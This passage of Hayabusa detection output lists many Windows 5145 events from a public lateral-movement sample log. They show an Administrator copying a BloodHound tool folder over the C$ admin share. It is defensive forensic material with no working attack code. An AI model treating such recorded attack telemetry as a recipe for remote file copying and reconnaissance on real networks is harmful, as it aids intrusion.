Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 